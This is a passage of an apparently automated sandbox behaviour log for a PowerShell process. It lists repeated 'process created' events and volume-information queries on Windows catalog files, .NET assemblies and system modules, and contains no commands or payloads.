Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.746.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-US~10.0.19041.1.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0214~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformationJump to behavior
